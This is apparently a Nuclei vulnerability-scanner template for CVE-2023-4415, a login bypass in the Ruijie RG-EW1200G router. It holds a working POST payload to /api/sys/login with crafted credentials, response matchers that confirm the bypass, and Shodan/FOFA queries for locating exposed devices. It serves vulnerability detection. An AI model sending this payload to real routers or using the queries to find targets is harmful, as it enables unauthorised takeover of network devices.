60 lines
2.0 KiB
YAML
60 lines
2.0 KiB
YAML
id: CVE-2023-4415
|
|
|
|
info:
|
|
name: Ruijie RG-EW1200G Router Background - Login Bypass
|
|
author: DhiyaneshDK
|
|
severity: high
|
|
description: |
|
|
A vulnerability was found in Ruijie RG-EW1200G 07161417 r483. It has been rated as critical. Affected by this issue is some unknown functionality of the file /api/sys/login. The manipulation leads to improper authentication. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-237518 is the identifier assigned to this vulnerability.
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-4415
|
|
- https://github.com/blakespire/repoforcve/tree/main/RG-EW1200G-logic
|
|
- https://vuldb.com/?ctiid.237518
|
|
- https://vuldb.com/?id.237518
|
|
- https://github.com/thedarknessdied/Ruijie_RG-EW1200G_login_bypass-CVE-2023-4415
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 8.8
|
|
cve-id: CVE-2023-4415
|
|
cwe-id: CWE-287
|
|
epss-score: 0.00593
|
|
epss-percentile: 0.78272
|
|
cpe: cpe:2.3:o:ruijienetworks:rg-ew1200g_firmware:07161417_r483:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: ruijienetworks
|
|
product: rg-ew1200g_firmware
|
|
shodan-query: http.html:"app.2fe6356cdd1ddd0eb8d6317d1a48d379.css"
|
|
fofa-query: body="app.2fe6356cdd1ddd0eb8d6317d1a48d379.css"
|
|
tags: cve2023,cve,ruijie,router,ruijienetworks
|
|
|
|
http:
|
|
- method: POST
|
|
path:
|
|
- "{{BaseURL}}/api/sys/login"
|
|
|
|
body: |
|
|
{
|
|
"username":"2",
|
|
"password":"admin",
|
|
"timestamp":1695218596000
|
|
}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '"result":"ok"'
|
|
- '"msg":"登入成功"'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- application/json
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022020896244e031d49e7315d5d7a04a1b190d61e9cb650d793b5043f1e715c994aa022100885c3f96f29b282e9f9657adafc6131cd3570d5aaad3a00ac6cf86145d578db6:922c64590222798bb761d5b6d8e72950 |